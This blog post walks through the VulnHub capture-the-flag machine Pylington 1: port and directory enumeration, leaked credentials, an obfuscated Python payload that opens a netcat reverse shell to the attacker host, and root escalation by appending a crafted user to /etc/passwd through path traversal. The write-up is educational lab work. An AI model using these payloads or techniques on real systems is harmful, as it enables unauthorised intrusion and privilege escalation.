Capture the flag (CTF)

PYLINGTON 1: VulnHub CTF Walkthrough

LetsPen Test
October 28, 2021 by
LetsPen Test

The goal of the capture the flag (CTF) is to gain root privileges on the target machine. Prerequisites would be knowledge of Linux commands and the ability to run some essential pentesting tools.

The torrent downloadable URL is also available for this VM; it's been added in the reference section of this article:

https://download.vulnhub.com/pylington/pylington.ova.

Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

The steps

  1. Getting the target machine IP address by running the virtual machine
  2. Getting open port details by using the Nmap tool
  3. Enumerating HTTP service with the Dirb utility
  4. Logging into the target application
  5. Taking reverse shell and getting user flag
  6. Getting the root and reading the root flag

So, now that we have all the information we need, let's get started with the challenge. 

The walkthrough

Step 1

The first step to solving any CTF is to identify the target machine's IP address; since we are running a virtual machine in the same network, we can identify the target machine's IP address by running the Netdiscover command. The output of the command can be seen in the following screenshot. [CLICK IMAGES TO ENLARGE]

Command used: << netdiscover >>

In the above screenshot, we have identified the IP address of all the devices connected to our router. Still, due to security reasons, we have hidden the MAC address of my personal connected devices. 

Our target machine IP address that we will be working on throughout this challenge is 192.168.1.7 (the target machine IP address). We will be using 192.168.1.29 as the attacker's IP address.

Note: The target machine IP address may be different in your case, as the network DHCP is assigning it.

Step 2

Since we have the target machine IP address, let's find out the entry points into the target machine. The first step is to find out the open ports and services available on the machine. We ran an Nmap full-port scan on the target machine for this purpose. The Nmap command was used, and the scan results can be seen in the following screenshot.

Command used: << nmap -sV -p- 192.168.1.25 >>

In the Nmap command, we used the '-sV' switch for version enumeration. We also used the '-p-' option for a full port scan. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. By default, Nmap conducts the scan only on known 1024 ports. So, it is crucial to conduct a full port scan during the pen test or solve the CTF for maximum results.

The Nmap output shows two ports on the target machine that have been identified as open, Port 22, which is being used for SSH service and port 80, which is being used for HTTP service.

Step 3

We'll start by exploring the open port and services on the target machine. We begin the enumeration by the HTTP port. After opening the IP address in the browser, we found an application running on it, which can be seen in the screenshot given below.

In the above screenshot, we can see that there is login and registration functionality available. We tried the registration option to create an account and login into the target application. However, the registration was not enabled.

Here, we can see a message on the screen that registration is not enabled. Let us click on the login page. The login page was working, and it can be seen below.

We tried various default username and password combinations on the login page, but none of them could be correct. We tried SQL injection on the login page, but no clue could be found. We decided to enumerate the files and folders on the target application. For this purpose, we used the Dirb utility, which identifies hidden files and folders in an application by brute-forcing common web application files and folders. The tool is by default available in Kali Linux. The scan command and results can be seen below.

Command used: Dirb http://192.168.1.7

The scan generated huge output. There was only one file, 'robots.txt,' where we got a 200 response code. We also identified that directory listing was enabled on the target machine. Let us open the file into the browser for further clues.

In the above screenshot, we can see three entries in the robots.txt file. We have already checked the register and login pages on the target application. We'll open the third directory path on the browser, which can be seen below.

Here, we got another webpage on the target application. We found a username and password on the web page. In the next step, we will use these credentials to log in to the target application using these credentials.

Step 4

We opened the login page on the target application and entered the identified credentials. The credentials can be seen below for reference:

Username: steve

Password: bcbkukHAeVxtjjVH

The login was successful, and we are now logged into the target application. This is a Python development environment. As per the information available on-screen, we can run Python programs through the input section, and the output will be shown on the screen. The Python program should not be more than nine lines. We did some research to create a reverse shell Python program. The program code can be seen below for reference:

strimp='imp'+'ort'+' o'+'s;'

strcmd='o'+'s.system("nc 192.168.1.29 1234 -e /bin/bash")'

exec(strimp)

exec(strcmd)

We will execute the above program on the target machine to get reverse shell access in the next step.

Step 5

We already have the reverse shell payload ready to be executed on the target machine. Let's execute it on the target application to take the reverse shell.

Command used: << nc -lvp 1234 >>

We quickly set up Netcat on our attacker machine to listen to incoming connections through port 1234. We entered the python program in the input field on the target application and clicked on run to execute. After waiting for some time, we got the reverse shell access on the attacker's machine Netcat terminal. This can be seen below.

Command used:

<< id >>

<< python -c ‘import pty;pty.spawn(“/bin/bash”)’ >>

We got access to the target machine, but it was an unstable shell. We run a Python 'bin/bash' command to gain stable access to the target machine. We are now logged into the target machine as user' http'. Let's analyze the target machine with this user to gain further access.

Command used: << ls -la >>

We started exploring various directories and files on the target machine. We found an interesting entry in the 'py' folder while analyzing the target machine. We found some interesting files. However, the files' password.txt' and 'user.txt' did not have read permissions for other user groups. There are other files in the folder; let's open them and read the contents. This can be seen in the screenshot given below.  

We opened the program file 'typing.cc' using the cat command to see the program. It mentions that if we type the given string as program input, it will show the password as a response. As the program is pre-compiled, we executed the program using the './typing' command. Then we entered the given sting as input which can be seen below.

the quick brown fox jumps over the lazy dog

However, the first time trying, it would not work. We tried again and entered the string multiple times as input. After writing the string three times as input, the program worked, and we identified the below password:

54ezhCGaJV

As we already know, there is another user named 'py' on the target machine, so we'll try to log in as this user using the identified password.

Command used: << su py >>

We used the 'su' command to log in as user py and entered the password. The login was successful as now we are logged into the target machine as user 'py.' The same was confirmed using the 'id' command, which can be seen in the above screenshot. As we had identified files in the user folder for which we did not have read permission. Let us read the files.

Command used: << cat user.txt >>

In the above screenshot, we can see the first flag file of the challenge user.txt. There is one more flag to be found, and that is the root flag. Let us enumerate the target machine further to get the root.

Step 6

We started exploring the target machine as user py. After some time, we found an intriguing directory named "secret_stuff" as shown below.

Command used: << cat backup.cc >>

There was a program file named 'backup.cc' in the directory. We opened the file to understand the program. From the code, we deduced that the program inputs the user and appends it in the 'srv/backup' directory. We did some research and found a method to append the user-provided input into the 'etc/passwd' file. This would help us get the root access of the target machine as we can add root user and password in the 'etc/passwd' file directly. But before that, we have to generate a password.

Command used: << openssl passwd -1 -salt INFOSEC infosec >>

We used the Openssl tool to generate a password. We created a new user named 'infosec' with root privilege. Let us run the program to add the root entry in the passwd file. This can be seen below.

Command used: << ./backup >>

In the above screenshot, first, we started the program using the './backup' command. After that, we entered the password created by us as 'infosec' user password entry. After that, the program asked to enter the directory where using the path traversal technique, we changed the path to 'etc/passwd.' We checked the file using the cat command, and we can see that the details have been successfully appended into the 'etc/passwd' file.

Let's log in to the target machine as user 'infosec' with the password created by us.

Command used: << su infosec >>

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

The login was successful. As the user has root privilege, we can read all the files owned by the root user. In the root directory, we found the root flag. The root flag named 'root.txt' can be seen in the above screenshot.

This completes the challenge; I hope you enjoyed this exercise.

 

Sources

LetsPen Test
LetsPen Test